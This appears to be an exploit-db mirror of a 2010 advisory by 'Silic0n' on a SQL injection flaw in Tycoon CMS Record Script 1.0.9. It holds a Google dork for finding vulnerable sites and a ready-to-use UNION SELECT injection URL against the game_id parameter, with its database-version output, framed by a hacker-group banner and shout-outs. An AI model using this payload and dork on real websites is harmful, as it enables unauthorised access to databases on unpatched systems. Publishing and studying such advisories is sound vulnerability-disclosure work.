Tycoon CMS Record Script 1.0.9 – SQL Injection

  • 作者: Silic0n
    日期: 2010-08-07
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/14572/
  • % Tycoon(CMS) Record Script Sql vulnerability
    
    -------------------------------------------------------------------------------
    0 | || || |TM
    1 ________ __ ___ ______| |__ __ ____| | _____ _ __ _ __ ___| |_ 
    0|_/ _ \| '_ \ / _ \______| '_ \ / _` |/ __| |/ / _ \ '__| '_ \ / _ \ __|
    1 / / (_) | | | |__/| | | | (_| | (__| <__/ | _| | | |__/ |_ 
    0/___\___/|_| |_|\___||_| |_|\__,_|\___|_|\_\___|_|(_)_| |_|\___|\__|
    1 0xPrivate 0xSecurity 0xTeam 
    0		++++++++++++++++++++++++++++++++++++++++++++++++++++
    1		 A Placec Of 0days 
    ------------------------------------------------------------------------------
    
    ^Exploit Title: Tycoon(CMS) Record Script Sql vulnerability
    ^Date 		: 7/8/2010
    ^Vendor Site 	: http://www.tycoon.co.kr
    ^MOD Version	: 1.0.9
    ^Author 	: Silic0n (science_media017[At]yahoo.com)
    ^category: 	: webapps/0day
    ^Dork		: inurl:index.php?mode=game_player
    
    ------------------------------------------------------------------------------
    Special Thnanks To Jackh4x0r , Gaurav_raj420 , Mr 52 (7) , Dalsim , Zetra , haZl0oh , root4o ,
     Dark , XG3N , Belma(sweety), messsy , Thor ,abronsius ,Nova ,
     ConsoleFx , Exi , Beenu , R4cal , jaya ,entr0py,[]0iZy5 & All my friends . 
    
    My Frnd Site : www.igniteds.net , www.anti-intruders.org (Will Be Up Very Soon) , www.root-market.com ,www.Darkode.com ,r00tDefaced.com
    
    ----------------------------------->Exploit<----------------------------------
    
    0x1: Goto http://{localhost}/record/index.php?mode=game_player&type=0&year=2010&game_id=-14 UNion Select 1,2,@@version
    
    Version : (4.0.22-log)
    
    ------------------------------------------------------------------------------